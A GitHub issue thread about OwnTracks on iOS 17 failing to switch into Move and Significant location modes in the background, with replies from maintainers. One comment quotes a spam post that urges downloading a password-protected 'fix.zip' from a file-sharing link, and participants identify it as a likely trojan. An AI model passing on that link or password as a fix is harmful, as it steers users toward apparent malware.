### ISSUE TITLE
Move mode and Significant mode do not start on iOS 17

### ISSUE THREAD

**Issue by jbrepogmailcom** [owntracks/ios#807]
Hello. From what I read in other posts, both Move and Significant modes should start if OwnTracks are in background and there is significant move.

It is not working on my phone (SE 2020). Maybe iOS kills the background process because it needs memory or whatever. I take care not to swipe the app out manually. Here is how it works in my case:

When I start moving after several hours of inactivity, there is no location reporting. Interestingly, exiting and entering zones works very well, so I assume that iOS send callback to the OT and it reports transition and location. I would assume that after that transition, the app should start reporting location, because it is activated by iOS and  because I have named zones like "HomeOT|2|2". However, it does not. Seems to me that iOS only wakes that particular function in OT that sends zone transition event, but does not wake "other" part of OT, that is responsible for managing Significant or Move modes.

Eventually, after half an hour or hour, or immediately when I open OT manually, location reporting starts. Sometimes it stops suddenly and goes back to mode when it reports only zone transitions.

Anyone else reported that?

**Comment by jbrepogmailcom** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

What is that, a trojan?

**Comment by jpmens** [comment]
Most likely. I'm having to delete several of these at the moment. (I've also edited your comment to remove the URL)

**Comment by jpmens** [comment]
That doesn't sound right. If you've given OwnTracks permission to see your device's location always, significant mode should work after a significant movment has taken place, e.g. move 500 or so meters. ("it depends").

What you might want to do is set up a [+follow region](https://owntracks.org/booklet/features/ios/#region-monitoring-with-follow) which should help the device track you better.

**Comment by jbrepogmailcom** [comment]
Hello. I have spent few days testing on iPhone SE 2020 and iOS 17.6 and here are my observations:
After few days, only detection of crossing region boundaries works. It seems to me that as this is iOS feature, it wakes OwnTracks when region is crossed, but OwnTracks only uses small process to send out mqtt message that boundary has been crossed, no other parts of OT are launched that would change mode from Significant to Move etc. I have several settings that should activate Move mode, switching from Significant! to Move! and back. These settings do not change even if boundary crossing occurs. It looks like most of the OT is killed by iOS and cannot be restarted. Only that boundary crossing mqtt works. I even have Shortcuts automation that should switch OT mode and even that does not work.

I tried +follow region, but it seems it only work occasionally. 

When I open Owntracks manually and leave it in background, it works for some time. But I would have to do that manually every day to keep it working.

I also noticed one unusual behavior of Home Assistant. When OwnTracks integration in HA detects that device is within any region, it ignores all location updates. So when I wanted to monitor movements within a region, I had to set up HA automation hook right on incoming mqtt messages and update location by that, not relying on OT integration.

So as final thought, may I please ask to check if there are any changes in later version of iOS that more aggressively kill processes that are running in background and do not allow them to respawn? That seems to be most logic explanation.

By the way, I also have OT running on Android. It works perfectly, when phone detects movement I send intent to switch it to Move mode and when stationery, I stop Move mode. It works for years without flaw and any change.

Thanks very much for help and your effort. Great product anyway!

**Comment by ckrey** [comment]
As already pointed out in #796 and #804, shortcuts don't work reliably in background and switching via region names like ""HomeOT|2|2"" move mode don't work either.

We do not test with HA integration, please refer to Home Assistant for your issues with HA.
